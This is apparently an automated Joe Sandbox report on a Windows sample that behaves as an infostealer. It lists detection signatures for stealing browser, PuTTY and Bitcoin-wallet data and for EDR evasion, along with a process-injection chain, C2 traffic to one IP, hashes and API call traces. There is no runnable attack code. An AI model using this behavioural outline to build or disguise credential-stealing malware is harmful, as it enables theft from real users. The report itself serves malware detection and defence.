Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kXzODlqJak.exe

Overview

General Information

Sample name:kXzODlqJak.exe
renamed because original name is a hash value
Original sample name:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
Analysis ID:1586711
MD5:ab79eafcce0d6eff856b259977e480e1
SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
Tags:exeuser-crep1x
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • kXzODlqJak.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\kXzODlqJak.exe" MD5: AB79EAFCCE0D6EFF856B259977E480E1)
    • kXzODlqJak.exe (PID: 6792 cmdline: "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632 MD5: 2C6652F7E01283DE091B5200B7878E69)
      • RescueCDBurner.exe (PID: 3772 cmdline: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 5432 cmdline: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 3688 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 6712 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 2264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 2856 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 2616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3764 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T14:55:26.263610+010020283713Unknown Traffic192.168.2.849712104.21.80.52443TCP
2025-01-09T14:55:27.755836+010020283713Unknown Traffic192.168.2.849714104.21.80.52443TCP
2025-01-09T14:55:29.238873+010020283713Unknown Traffic192.168.2.849726104.21.80.52443TCP
2025-01-09T14:55:59.854963+010020283713Unknown Traffic192.168.2.850002104.21.80.52443TCP
2025-01-09T14:56:01.130938+010020283713Unknown Traffic192.168.2.850010104.21.80.52443TCP
2025-01-09T14:56:02.813321+010020283713Unknown Traffic192.168.2.850021104.21.80.52443TCP
2025-01-09T14:56:04.940883+010020283713Unknown Traffic192.168.2.850036104.21.80.52443TCP
2025-01-09T14:56:05.860640+010020283713Unknown Traffic192.168.2.850042104.21.80.52443TCP
2025-01-09T14:56:06.831955+010020283713Unknown Traffic192.168.2.850049104.21.80.52443TCP
2025-01-09T14:56:08.305767+010020283713Unknown Traffic192.168.2.850060104.21.80.52443TCP
2025-01-09T14:56:09.807091+010020283713Unknown Traffic192.168.2.850068104.21.80.52443TCP
2025-01-09T14:56:11.019877+010020283713Unknown Traffic192.168.2.850075104.21.80.52443TCP
2025-01-09T14:56:24.536355+010020283713Unknown Traffic192.168.2.850094104.21.80.52443TCP
2025-01-09T14:56:25.966323+010020283713Unknown Traffic192.168.2.850095104.21.80.52443TCP
2025-01-09T14:56:26.880181+010020283713Unknown Traffic192.168.2.850096104.21.80.52443TCP
2025-01-09T14:56:27.717800+010020283713Unknown Traffic192.168.2.850097104.21.80.52443TCP
2025-01-09T14:56:28.857174+010020283713Unknown Traffic192.168.2.850098104.21.80.52443TCP
2025-01-09T14:56:29.855414+010020283713Unknown Traffic192.168.2.850099104.21.80.52443TCP
2025-01-09T14:56:31.024826+010020283713Unknown Traffic192.168.2.850100104.21.80.52443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: kXzODlqJak.exeReversingLabs: Detection: 44%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FED3B DecryptFileW,0_2_008FED3B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0093A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0093A2D0
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FDA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_008FDA0E
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FEA4B DecryptFileW,0_2_008FEA4B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FDB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_008FDB8F
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FECE9 DecryptFileW,0_2_008FECE9
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3ED3B DecryptFileW,2_2_00F3ED3B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F7A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_00F7A2D0
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3EA4B DecryptFileW,2_2_00F3EA4B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_00F3DA0E
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_00F3DB8F
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3ECE9 DecryptFileW,2_2_00F3ECE9
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_faf883c4-f

Bitcoin Miner

barindex
Found strings related to Crypto-Mining
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2492926906.000000000802C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: jsecoin.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2492926906.000000000802C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: coinhive.com/
Source: kXzODlqJak.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeFile opened: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dllJump to behavior
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50002 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50021 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50036 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50042 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50049 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50060 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50068 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50075 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50094 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50095 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50096 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50097 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50098 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.80.52:443 -> 192.168.2.8:50100 version: TLS 1.2
Source: kXzODlqJak.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0 source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateO source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58314 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1525283070.000000006C0C1000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1587284521.000000006B0A1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1525430639.000000006C311000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1587494313.000000006B161000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statez source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State> source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "winload_prod.pdbk source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2538008973.00000000004FF000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1527099049.000000006CFB1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1590096177.000000006BE01000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008E5C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_008E5C81
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_00931290 FindFirstFileExW,0_2_00931290
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_0094343B FindFirstFileW,FindClose,0_2_0094343B
Source: C:\Users\user\Desktop\kXzODlqJak.exeCode function: 0_2_008FE72A FindFirstFileW,FindNextFileW,FindClose,0_2_008FE72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F71290 FindFirstFileExW,2_2_00F71290
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F8343B FindFirstFileW,FindClose,2_2_00F8343B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F3E72A FindFirstFileW,FindNextFileW,FindClose,2_2_00F3E72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_00F25C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00F25C81
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D0A0D44
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0A0534 _memset,FindFirstFileW,FindClose,2_2_6D0A0534
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D07B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D07B005
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D0772FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D0772FA
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C11CC23
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C11C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C11C8FD
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exeCode function: 3_2_6C0E81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C0E81A1
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
